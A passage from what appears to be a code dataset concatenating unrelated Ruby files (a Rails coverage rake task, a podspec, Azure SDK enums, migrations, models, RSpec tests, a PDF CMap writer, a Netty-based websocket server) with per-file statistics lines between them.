desc "Make sure test coverage doesn't drop below THRESHOLD"
task :ensure do
require 'json'
threshold = Float(ENV['COVERAGE_THRESHOLD'] || ENV['THRESHOLD'] || 80)
path = Rails.root.join("coverage/.last_run.json")
data = JSON.parse File.read(path)
covered = data.fetch('result').fetch('covered_percent')
if covered < threshold
raise "Test coverage #{covered}% is below the threshold of #{threshold}%. Not good enough, sorry."
end
end
end
end
end
| 29 | 108 | 0.626251 |
790373de98c27512dc1d0b56d96238b5f61fe77d | 572 | Pod::Spec.new do |spec|
spec.name = "Every.swift"
spec.version = "1.0.0"
spec.summary = "An Swift wrapper for NSTimer"
spec.homepage = "https://github.com/samhann/Every.swift"
spec.license = { type: 'MIT', file: 'LICENSE' }
spec.authors = { "Samhan" => 'pickledbrains+pods@gmail.com' }
spec.social_media_url = "http://twitter.com/samhanknr"
spec.platform = :ios, "8.0"
spec.requires_arc = true
spec.source = { git: "https://github.com/samhann/Every.swift.git", tag: "v#{spec.version}", submodules: true }
spec.source_files = "src/**/*.{h,swift}"
end | 40.857143 | 112 | 0.666084 |
bb8c5f9616f9b568636ab2caadb643cd8acd99d0 | 585 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Web::Mgmt::V2020_09_01
module Models
#
# Defines values for SkuName
#
module SkuName
Free = "Free"
Shared = "Shared"
Basic = "Basic"
Standard = "Standard"
Premium = "Premium"
Dynamic = "Dynamic"
Isolated = "Isolated"
PremiumV2 = "PremiumV2"
ElasticPremium = "ElasticPremium"
ElasticIsolated = "ElasticIsolated"
end
end
end
| 23.4 | 70 | 0.644444 |
1a8d4ec553e92115762cb5719c225cb997a34d62 | 121 | class AddCollumToSearches < ActiveRecord::Migration
def change
add_column :searches, :image_url, :string
end
end
| 20.166667 | 51 | 0.768595 |
08d445871d8577008f01fa0752ff21351af86fdc | 47 | module Cronofy
VERSION = "0.37.7".freeze
end
| 11.75 | 27 | 0.702128 |
2656cafeeeb89631bba9b6fe7d051933c3fe7f82 | 359 | class CreatePrsAccounts < ActiveRecord::Migration[6.1]
def change
create_table :prs_accounts do |t|
t.belongs_to :user
t.string :account
t.string :status
t.string :public_key
t.string :encrypted_private_key
t.jsonb :keystore
t.timestamps
end
add_index :prs_accounts, :account, unique: true
end
end
| 19.944444 | 54 | 0.668524 |
f7aae90d8ee136611b562b16704042fce5cfdfe8 | 677 | class Micropost < ApplicationRecord
belongs_to :user
has_many :likes, dependent: :destroy
default_scope -> {order(created_at: :desc)}
mount_uploader :picture, PictureUploader
validates :user_id, presence: true
validates :content,presence: true, length: {maximum: 140}
validate :picture_size
def self.search(search)
if search
where(['content LIKE?', "%#{search}%"])
else
all
end
end
def like_user(user_id)
likes.find_by(user_id: user_id)
end
private
#ใขใใใญใผใใใใ็ปๅใฎใตใคใบใใใชใใผใทใงใณใใ
def picture_size
if picture.size > 2.megabytes
errors.add(:picture, "should be less then 2MB")
end
end
end
| 21.15625 | 59 | 0.676514 |
331e8b779540b3fa8b7fdf79767efc1cae4e06e2 | 2,961 | require "spec_helper"
RSpec.describe IEXCloud::Response do
let(:raw_response) { double(status: 200, body: "OK") }
subject(:response) { described_class.new(raw_response) }
describe "#initialize" do
it "assigns the raw_response" do
expect(response.raw_response).to eq raw_response
end
end
describe "#status" do
it "delegates to the raw response" do
expect(response.status).to eq raw_response.status
end
end
describe "#body" do
it "delegates to the raw response" do
expect(response.body).to eq raw_response.body
end
end
describe "#success?" do
subject { response.success? }
context "when the status is 200" do
it { is_expected.to be true }
end
context "when the status is anything else" do
let(:raw_response) { double(status: 401) }
it { is_expected.to be false }
end
end
describe "#on_error" do
subject(:on_error) { response.on_error }
it { is_expected.to eq response }
context "when request is a success" do
it "does nothing" do
expect { |b| response.on_error(&b) }.not_to yield_control
end
end
context "when request has an error" do
it "yields to the associated block" do
allow(response).to receive(:success?).and_return(false)
expect { |b| response.on_error(&b) }.to yield_control
end
end
end
describe "#raise_errors" do
subject { response.raise_errors }
let(:raw_response) { double(status: status, body: { "exception" => { "message" => "Error message" } }) }
context "when the status is 400" do
let(:status) { 400 }
it "raises an InvalidRequest error" do
expect { subject }.to raise_error(IEXCloud::InvalidRequest)
end
end
context "when the status is 401" do
let(:status) { 401 }
it "raises an AccessDenied error" do
expect { subject }.to raise_error(IEXCloud::AccessDenied)
end
end
context "when the status is 403" do
let(:status) { 403 }
it "raises an InvalidAuth error" do
expect { subject }.to raise_error(IEXCloud::InvalidAuth)
end
end
context "when the status is 404" do
let(:status) { 404 }
it "raises a ResourceNotFound error" do
expect { subject }.to raise_error(IEXCloud::ResourceNotFound)
end
end
context "when the status is 405" do
let(:status) { 405 }
it "raises a MethodNotAllowed error" do
expect { subject }.to raise_error(IEXCloud::MethodNotAllowed)
end
end
context "when the status is 400 through 499" do
let(:status) { 402 }
it "raises a ServiceError" do
expect { subject }.to raise_error(IEXCloud::ServiceError)
end
end
context "when the status is 500 through 599" do
let(:status) { 555 }
it "raises a ServerError" do
expect { subject }.to raise_error(IEXCloud::ServerError)
end
end
end
end
| 25.973684 | 108 | 0.638298 |
11642ea5e11df062045e8ad9b2f9a209cd8ac02f | 2,221 | # -*- coding: utf-8 -*-
# Copyright (C) 2010-2011, 2015 Rocky Bernstein <rockyb@rubyforge.net>
require_relative '../base/subcmd'
class Trepan::Subcommand::SetDifferent < Trepan::SetBoolSubcommand
unless defined?(HELP)
Trepanning::Subcommand.set_name_prefix(__FILE__, self)
HELP = <<-EOH
**#{PREFIX.join(' ')}** [**on**|**off**|**nostack**]
Set to make sure `next` or `step` moves to a new position.
Due to the interpretive, expression-oriented nature of the Ruby
Language and implementation, each line often may contain many possible
stopping points with possibly different event type. In a debugger it
is sometimes desirable to continue but stop only when the position
next changes.
Setting to "different" to on will cause each `step` or `next` command to
stop at a different position.
Note though that the notion of different does take into account stack
nesting. So in `ARGV.map {|arg| arg.to_i}`, you get a stop before
*ARGV* as well as one in the block as well as before to call to
*to_i*.
If you wan to ignore stopping at added nesting levels, there are two
possibilities. `set step nostack` will ignore stack nestings levels on
a given line. Also you can use 'next', but that also skips stepping
into functions.
See also:
---------
The debugger command `step`, `next` have suffixes '+' and '-' which
override this setting.
EOH
IN_LIST = true
MIN_ABBREV = 'dif'.size
SHORT_HELP = "Set to make sure 'next/step' move to a new position."
end
completion %w(on off nostack)
def run(args)
if args.size == 3 && 'nostack' == args[2]
@proc.settings[:different] = 'nostack'
msg("different is nostack.")
else
super
end
@proc.different_pos = @proc.settings[:different]
end
end
if __FILE__ == $0
# Demo it.
require_relative '../../mock'
name = File.basename(__FILE__, '.rb')
# FIXME: DRY the below code
dbgr, cmd = MockDebugger::setup('set')
subcommand = Trepan::Subcommand::SetDifferent.new(cmd)
testcmdMgr = Trepan::Subcmd.new(subcommand)
subcommand.run_show_bool
# subcommand.summary_help(name)
puts
puts '-' * 20
puts subcommand.save_command
end
| 30.013514 | 73 | 0.684376 |
33a8372e384bde5fc0630b940a2dd059d1bd89a7 | 435 | Rails.application.routes.draw do
root to: 'welcome#index'
get '/oauth2-callback', to: 'o_auth#oauth_callback'
get '/logout', to: 'o_auth#logout'
get '/login', to: 'o_auth#login'
get '/register', to: 'o_auth#register'
post '/registration_webhook', to: 'registration_webhook#handle_registration'
get '/verify', to: 'verify#index'
get '/verify_success', to: 'verify#success'
post '/verify', to: 'verify#check_code'
end
| 33.461538 | 78 | 0.703448 |
87691b8d1d9bf6199ab943e6aad265b7ba08b775 | 1,603 | require 'test_helper'
class FollowingTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
@other = users(:archer)
log_in_as(@user)
end
test "following page do" do
get following_user_path(@user)
assert_not @user.following.empty?
assert_match @user.following.count.to_s, response.body
@user.following.each do |user|
assert_select "a[href=?]", user_path(user)
end
end
test "followers page" do
get followers_user_path(@user)
assert_not @user.followers.empty?
assert_match @user.followers.count.to_s, response.body
@user.followers.each do |user|
assert_select "a[href=?]", user_path(user)
end
end
test "should follow a user the standard way" do
assert_difference '@user.following.count', 1 do
post relationships_path, params: {followed_id: @other.id}
end
end
test "should follow a user with Ajax" do
assert_difference '@user.following.count', 1 do
post relationships_path, xhr:true, params: { followed_id: @other.id}
end
end
test "should unfollow a user the standard way" do
@user.follow(@other)
relationship = @user.active_relationships.find_by(followed_id: @other.id)
assert_difference '@user.following.count', -1 do
delete relationship_path(relationship)
end
end
test "should unfollow a user with Ajax" do
@user.follow(@other)
relationship = @user.active_relationships.find_by(followed_id: @other.id)
assert_difference '@user.following.count', -1 do
delete relationship_path(relationship), xhr: true
end
end
end
| 28.122807 | 77 | 0.703681 |
7a2290f1f0323bfe9676e12d45b53ee2c348c60d | 606 | cask 'principle' do
version '0.0.81'
sha256 '640afca3255a5e1938bf53e4944f37a8116898a4de873a6fdad4e4322a6ddbd7'
# dropboxusercontent.com is the official download host per the vendor homepage
url "https://dl.dropboxusercontent.com/u/13897407/Principle_#{version.dots_to_underscores}.zip"
appcast 'https://dl.dropboxusercontent.com/u/13897407/buildTrain-601A6666-57A4-4C19-BDD3-1387B3CB9719.xml',
:checkpoint => '19d2ed17922df59075a92e5b8773ea28f781127f916a3e93027d1b76645c46bf'
name 'Principle'
homepage 'http://principleformac.com/'
license :commercial
app 'Principle.app'
end
| 40.4 | 109 | 0.79538 |
bb7ae74d1ac25550a969d3a3770f18698548dc38 | 6,007 | # -*- encoding: utf-8; frozen_string_literal: true -*-
#
#--
# This file is part of HexaPDF.
#
# HexaPDF - A Versatile PDF Creation and Manipulation Library For Ruby
# Copyright (C) 2014-2019 Thomas Leitner
#
# HexaPDF is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License version 3 as
# published by the Free Software Foundation with the addition of the
# following permission added to Section 15 as permitted in Section 7(a):
# FOR ANY PART OF THE COVERED WORK IN WHICH THE COPYRIGHT IS OWNED BY
# THOMAS LEITNER, THOMAS LEITNER DISCLAIMS THE WARRANTY OF NON
# INFRINGEMENT OF THIRD PARTY RIGHTS.
#
# HexaPDF is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public
# License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with HexaPDF. If not, see <http://www.gnu.org/licenses/>.
#
# The interactive user interfaces in modified source and object code
# versions of HexaPDF must display Appropriate Legal Notices, as required
# under Section 5 of the GNU Affero General Public License version 3.
#
# In accordance with Section 7(b) of the GNU Affero General Public
# License, a covered work must retain the producer line in every PDF that
# is created or manipulated using HexaPDF.
#
# If the GNU Affero General Public License doesn't fit your need,
# commercial licenses are available at <https://gettalong.at/hexapdf/>.
#++
require 'hexapdf/font/cmap'
module HexaPDF
module Font
class CMap
# Creates a CMap file.
#
# Currently only ToUnicode CMaps are supported.
class Writer
# Maximum number of entries in one section.
MAX_ENTRIES_IN_SECTION = 100
# Returns a ToUnicode CMap for the given input code to Unicode codepoint mapping which needs
# to be sorted by input codes.
#
# Note that the returned CMap always uses a 16-bit input code space!
def create_to_unicode_cmap(mapping)
return to_unicode_template % '' if mapping.empty?
chars, ranges = compute_section_entries(mapping)
result = create_sections("bfchar", chars.size / 2) do |index|
index *= 2
sprintf("<%04X>", chars[index]) << "<" <<
((+'').force_encoding(::Encoding::UTF_16BE) << chars[index + 1]).unpack1('H*') <<
">\n"
end
result << create_sections("bfrange", ranges.size / 3) do |index|
index *= 3
sprintf("<%04X><%04X>", ranges[index], ranges[index + 1]) << "<" <<
((+'').force_encoding(::Encoding::UTF_16BE) << ranges[index + 2]).unpack1('H*') <<
">\n"
end
to_unicode_template % result.chop!
end
private
# Computes the entries for the "char" and "range" sections based on the given mapping.
#
# Returns two arrays +char_mappings+ and +range_mappings+ where +char_mappings+ is an array
# of the form
#
# [code1, value1, code2, value2, ...]
#
# and +range_mappings+ an array of the form
#
# [start1, end1, value1, start2, end2, value2, ...]
def compute_section_entries(mapping)
chars = []
ranges = []
last_code, last_value = *mapping[0]
is_range = false
mapping.slice(1..-1).each do |code, value|
if last_code + 1 == code && last_value + 1 == value && code % 256 != 0
ranges << last_code << nil << last_value unless is_range
is_range = true
elsif is_range
ranges[-2] = last_code
is_range = false
else
chars << last_code << last_value
end
last_code = code
last_value = value
end
# Handle last remaining mapping
if is_range
ranges[-2] = last_code
else
chars << last_code << last_value
end
[chars, ranges]
end
# Creates one or more sections of a CMap file and returns the resulting string.
#
# +type+::
# The name of the section, e.g. "bfchar" or "bfrange".
#
# +size+::
# The maximum number of elements of this type. Used for determining when to start a new
# section.
#
# The method makes sure that no section has more than the maximum number of allowed entries.
#
# Numbers from 0 up to size - 1 are yielded, indicating the current entry that should be
# processed and for which an appropriate section line should be returned from the block.
def create_sections(type, size)
return +'' if size == 0
result = +""
index = 0
while size > 0
count = [MAX_ENTRIES_IN_SECTION, size].min
result << "#{count} begin#{type}\n"
index.upto(index + count - 1) {|i| result << yield(i) }
result << "end#{type}\n"
index += count
size -= count
end
result
end
# Returns the CMap file template for a ToUnicode CMap.
def to_unicode_template
<<~TEMPLATE
/CIDInit /ProcSet findresource begin
12 dict begin
begincmap
/CIDSystemInfo
<< /Registry (Adobe)
/Ordering (UCS)
/Supplement 0
>> def
/CMapName /Adobe-Identity-UCS def
/CMapType 2 def
1 begincodespacerange
<0000> <FFFF>
endcodespacerange
%s
endcmap
CMapName currentdict /CMap defineresource pop
end
end
TEMPLATE
end
end
end
end
end
| 33.747191 | 100 | 0.589978 |
bb26930d7eba602534e4879805961898db6066a1 | 320 | # frozen_string_literal: true
require 'test/unit'
require_relative 'test-helper'
class TestHeartbeat < Test::Unit::TestCase
def test_heartbeat
res = $bien_conn.get '/heartbeat'
assert_instance_of(Faraday::Response, res)
assert_equal(200, res.status)
assert_instance_of(String, res.body)
end
end
| 18.823529 | 46 | 0.74375 |
eda73c3743677b9313e09187b66218b3fbc1b6f7 | 124 | module FeishuBot
class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
end
end
| 20.666667 | 54 | 0.806452 |
ab79ee0c0186e4e3c7159ea6599181f49a534cbe | 1,135 | cask 'unity-facebook-games-support-for-editor@2018.2.0b3' do
version '2018.2.0b3,0a6b93065060'
sha256 :no_check
url "http://beta.unity3d.com/download/0a6b93065060/MacEditorTargetInstaller/UnitySetup-Facebook-Games-Support-for-Editor-2018.2.0b3.pkg"
name 'Facebook Gameroom Build Support'
homepage 'https://unity3d.com/unity/'
pkg 'UnitySetup-Facebook-Games-Support-for-Editor-2018.2.0b3.pkg'
depends_on cask: 'unity@2018.2.0b3'
preflight do
if File.exist? "/Applications/Unity"
FileUtils.move "/Applications/Unity", "/Applications/Unity.temp"
end
if File.exist? "/Applications/Unity-2018.2.0b3"
FileUtils.move "/Applications/Unity-2018.2.0b3", '/Applications/Unity'
end
end
postflight do
if File.exist? '/Applications/Unity'
FileUtils.move '/Applications/Unity', "/Applications/Unity-2018.2.0b3"
end
if File.exist? '/Applications/Unity.temp'
FileUtils.move '/Applications/Unity.temp', '/Applications/Unity'
end
end
uninstall quit: 'com.unity3d.UnityEditor5.x',
delete: '/Applications/Unity-2018.2.0b3/PlaybackEngines/Facebook'
end
| 31.527778 | 138 | 0.717181 |
d525143c101d876294a487f2e9aad77ad4ded4bd | 143 | # typed: strict
# frozen_string_literal: true
module Calificador
module Context
class ConditionContext < BasicContext
end
end
end
| 14.3 | 41 | 0.755245 |
5df349a5a1fe94b2506a9bbf28f8322b3e783ba8 | 2,115 | require './test/test_helper'
# Essentialy the same as test_threading.rb but with an expanded pool for
# testing multiple connections.
class TestThreadingLargePool < Test::Unit::TestCase
include Mongo
@@db = standard_connection(:pool_size => 50, :timeout => 60).db(MONGO_TEST_DB)
@@coll = @@db.collection('thread-test-collection')
def set_up_safe_data
@@db.drop_collection('duplicate')
@@db.drop_collection('unique')
@duplicate = @@db.collection('duplicate')
@unique = @@db.collection('unique')
@duplicate.insert("test" => "insert")
@duplicate.insert("test" => "update")
@unique.insert("test" => "insert")
@unique.insert("test" => "update")
@unique.create_index("test", :unique => true)
end
def test_safe_update
set_up_safe_data
threads = []
300.times do |i|
threads[i] = Thread.new do
if i % 2 == 0
assert_raise Mongo::OperationFailure do
@unique.update({"test" => "insert"}, {"$set" => {"test" => "update"}}, :safe => true)
end
else
@duplicate.update({"test" => "insert"}, {"$set" => {"test" => "update"}}, :safe => true)
end
end
end
300.times do |i|
threads[i].join
end
end
def test_safe_insert
set_up_safe_data
threads = []
300.times do |i|
threads[i] = Thread.new do
if i % 2 == 0
assert_raise Mongo::OperationFailure do
@unique.insert({"test" => "insert"}, :safe => true)
end
else
@duplicate.insert({"test" => "insert"}, :safe => true)
end
end
end
300.times do |i|
threads[i].join
end
end
def test_threading
@@coll.drop
@@coll = @@db.collection('thread-test-collection')
1000.times do |i|
@@coll.insert("x" => i)
end
threads = []
10.times do |i|
threads[i] = Thread.new do
sum = 0
@@coll.find().each do |document|
sum += document["x"]
end
assert_equal 499500, sum
end
end
10.times do |i|
threads[i].join
end
end
end
| 23.241758 | 98 | 0.564539 |
398cbd98a9ec51ba2f45b3370bc538197a212887 | 573 | class Api::UsersController < ApplicationController
def index
@users = User.all
render json: @users
end
def show
@user = User.includes(:submitted_responses, polls: [answers: :responses]).find(params[:id])
render :show
end
def create
@user = User.new(user_params)
if @user.save
sign_in!(@user)
render :show
else
render json: @user.errors.full_messages, status: :unprocessable_entity
end
end
protected
def user_params
params.require(:user).permit(:first_name, :last_name, :email, :password)
end
end
| 19.758621 | 95 | 0.671902 |
79148e98be816e6f5d4bd4b39a6016f786e54f58 | 251 | class CreateYearStatistics < ActiveRecord::Migration
def change
create_table :year_statistics do |t|
t.integer :user_id
t.integer :year
t.json :data
t.timestamps
end
add_index :year_statistics, :user_id
end
end
| 20.916667 | 52 | 0.685259 |
ac8396e6e79dce6ab4a6a1a185f005e4e41b8a67 | 3,789 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
# config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
# config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "hub_#{Rails.env}"
# config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
# config.active_record.dump_schema_after_migration = false
end
| 41.184783 | 102 | 0.75508 |
e2a9ad69cc8a9f8c7ef4f8e91a4191d459c82599 | 446 | require "rubygems"
require "sass"
require "compass"
DEFAULT_FRAMEWORKS = ["compass", "blueprint"]
ARGV.each do |arg|
next if arg == "compass"
next if arg == "blueprint"
require arg
end
Compass::Frameworks::ALL.each do |framework|
next if framework.name =~ /^_/
next if DEFAULT_FRAMEWORKS.include?(framework.name) && !ARGV.include?(framework.name)
print "#{File.expand_path(framework.stylesheets_directory)}\n"
end
| 24.777778 | 88 | 0.697309 |
b92b2da2f21d5610783e37e0709ced134c7db0c4 | 183 | class Post < ActiveRecord::Base
belongs_to :user
has_and_belongs_to_many :tags
has_many :comments
validates :title, :presence => true
validates :body, :presence => true
end
| 22.875 | 37 | 0.743169 |
6af22e7263d5abcbc846000369224112fef94e85 | 1,564 | ##
# This is the controller that allows managing the access groups used for authorizing access to resources.
#
class AccessGroupsController < ApplicationController
before_action :validate_user
before_action :set_access_group, only: [:show, :edit, :update, :destroy]
##
# GET /access_groups
def index
@access_groups = AccessGroup.all.sorted
end
##
# GET /access_groups/1
def show
end
##
# GET /access_groups/new
def new
@access_group = AccessGroup.new
end
##
# GET /access_groups/1/edit
def edit
end
##
# POST /access_groups
def create
@access_group = AccessGroup.new(access_group_params)
if @access_group.save
redirect_to access_groups_url, notice: 'Access group was successfully created.'
else
render :new
end
end
##
# PATCH/PUT /access_groups/1
def update
if @access_group.update(access_group_params)
redirect_to access_groups_url, notice: 'Access group was successfully updated.'
else
render :edit
end
end
##
# DELETE /access_groups/1
def destroy
@access_group.destroy
redirect_to access_groups_url, notice: 'Access group was successfully destroyed.'
end
private
def validate_user
authorize! true
end
# Use callbacks to share common setup or constraints between actions.
def set_access_group
@access_group = AccessGroup.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
def access_group_params
params.require(:access_group).permit(:name, :ldap_group_list)
end
end
| 20.853333 | 105 | 0.711637 |
62cdbde2a5a0e308ae86876f94bcc2d632b3901a | 1,321 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-backup/types'
require_relative 'aws-sdk-backup/client_api'
require_relative 'aws-sdk-backup/client'
require_relative 'aws-sdk-backup/errors'
require_relative 'aws-sdk-backup/resource'
require_relative 'aws-sdk-backup/customizations'
# This module provides support for AWS Backup. This module is available in the
# `aws-sdk-backup` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# backup = Aws::Backup::Client.new
# resp = backup.create_backup_plan(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS Backup are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::Backup::Errors::ServiceError
# # rescues all AWS Backup API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::Backup
GEM_VERSION = '1.44.0'
end
| 24.462963 | 78 | 0.735049 |
5d0085ef0889fdc58dddd184f3d09d13862e85dd | 2,165 | # frozen_string_literal: true
#
# Cookbook:: asdf
# Resource:: script
#
# Copyright:: 2017, Fernando Aleman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
provides :asdf_script
property :user, String, required: true
property :code, String, required: true
property :group, String, default: lazy { user }
property :cwd, String, default: lazy { ::File.expand_path("~#{user}") }
property :creates, String
property :path, Array
property :environment, Hash
property :returns, Array, default: [0]
property :timeout, Integer
property :umask, [String, Integer]
property :live_stream, [true, false], default: false
action :run do
bash new_resource.name do
user new_resource.user
code script_code
group new_resource.group
cwd new_resource.cwd
creates new_resource.creates if new_resource.creates
environment(script_environment)
returns new_resource.returns
timeout new_resource.timeout if new_resource.timeout
umask new_resource.umask if new_resource.umask
live_stream new_resource.live_stream
end
end
action_class do
include Chef::Asdf::ScriptHelpers
def script_code
script = []
script << %(export PATH="#{asdf_path}/bin:$PATH")
script << %(source /etc/profile.d/asdf.sh)
script << new_resource.code
script.join("\n").concat("\n")
end
def script_environment
script_env = {}
script.merge!(new_resource.environment) if new_resource.environment
if new_resource.path
script_env['PATH'] = "#{new_resource.path.join(':')}:#{ENV['PATH']}"
end
script_env['USER'] = new_resource.user
script_env['HOME'] = ::File.expand_path("~#{new_resource.user}")
script_env
end
end
| 29.256757 | 74 | 0.728868 |
4a4168fbff6cdcc214d1d9fd20bba7f33a986f47 | 356 | Sequel.migration do
change do
create_table :reg_0305 do
column :id, Integer, primary_key: true
column :id_pai, Integer, index: true, null: false
column :cod_ccus, String, size: 60
column :func, String, size: 1000
column :vida_util, String, size: 3
column :cnpj_pai, String, size: 14, index: true
end
end
end
| 27.384615 | 55 | 0.657303 |
1cb490bdafe9efc31edca5dde3775cf08a60bced | 2,029 | require 'clamp/errors'
require 'clamp/subcommand/definition'
module Clamp
module Subcommand
module Declaration
def recognised_subcommands
@recognised_subcommands ||= []
end
def subcommand(name, description, subcommand_class = self, &block)
unless has_subcommands?
@subcommand_parameter = if @default_subcommand
parameter "[SUBCOMMAND]", "subcommand", :attribute_name => :subcommand_name, :default => @default_subcommand
else
parameter "SUBCOMMAND", "subcommand", :attribute_name => :subcommand_name, :required => false
end
remove_method :default_subcommand_name
parameter "[ARG] ...", "subcommand arguments", :attribute_name => :subcommand_arguments
end
if block
# generate a anonymous sub-class
subcommand_class = Class.new(subcommand_class, &block)
end
recognised_subcommands << Subcommand::Definition.new(name, description, subcommand_class)
end
def has_subcommands?
!recognised_subcommands.empty?
end
def find_subcommand(name)
recognised_subcommands.find { |sc| sc.is_called?(name) }
end
def parameters_before_subcommand
parameters.take_while { |p| p != @subcommand_parameter }
end
def inheritable_attributes
recognised_options + parameters_before_subcommand
end
def default_subcommand=(name)
if has_subcommands?
raise Clamp::DeclarationError, "default_subcommand must be defined before subcommands"
end
@default_subcommand = name
end
def default_subcommand(*args, &block)
if args.empty?
@default_subcommand
else
$stderr.puts "WARNING: Clamp default_subcommand syntax has changed; check the README."
$stderr.puts " (from #{caller.first})"
self.default_subcommand = args.first
subcommand(*args, &block)
end
end
end
end
end
| 29.838235 | 120 | 0.648595 |
288d2ca78f1ee609d579862531c028076ea9d444 | 1,658 | # Copyright 2011 Marek Jelen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Wildcloud
module Websockets
class Server
def initialize(router, address, port)
@router = router
@address = address
@port = port
@bootstrap = ServerBootstrap.new(NioServerSocketChannelFactory.new(Executors.newCachedThreadPool, Executors.newCachedThreadPool))
@bootstrap.pipeline_factory = PipelineFactory.new(@router)
end
def start
puts "Starting at #{@address} and #{@port}"
@bootstrap.bind(InetSocketAddress.new(@address, @port))
end
end
class PipelineFactory
include ChannelPipelineFactory
def initialize(router)
@router = router
end
def getPipeline
pipeline = Channels.pipeline
pipeline.add_last('decoder', HttpRequestDecoder.new)
pipeline.add_last('aggregator', HttpChunkAggregator.new(130 * 1024))
pipeline.add_last('encoder', HttpResponseEncoder.new)
pipeline.add_last('preflight', PreflightHandler.new)
pipeline.add_last('handler', @router)
pipeline
end
end
end
end | 29.607143 | 137 | 0.697226 |
f734609ca3fb1b93ffb60941c4f16e3641439962 | 6,444 | # encoding: utf-8
require File.join(File.dirname(__FILE__), 'spec_helper')
describe FixedWidth::Section do
before(:each) do
@section = FixedWidth::Section.new(:body)
end
it "should have no columns after creation" do
@section.columns.should be_empty
end
describe "when adding columns" do
it "should build an ordered column list" do
@section.should have(0).columns
col1 = @section.column :id, 10
col2 = @section.column :name, 30
col3 = @section.column :state, 2
@section.should have(3).columns
@section.columns[0].should be(col1)
@section.columns[1].should be(col2)
@section.columns[2].should be(col3)
end
it "should create spacer columns" do
@section.should have(0).columns
@section.spacer(5)
@section.should have(1).columns
end
it "can should override the alignment of the definition" do
section = FixedWidth::Section.new('name', :align => :left)
section.options[:align].should == :left
end
it "should use a missing method to create a column" do
@section.should have(0).columns
@section.first_name 5
@section.should have(1).columns
end
it "should prevent duplicate column names without any groupings" do
@section.column :id, 10
lambda { @section.column(:id, 30) }.should raise_error(FixedWidth::DuplicateColumnNameError, /column named 'id'/)
end
it "should prevent column names that already exist as groups" do
@section.column :foo, 11, :group => :id
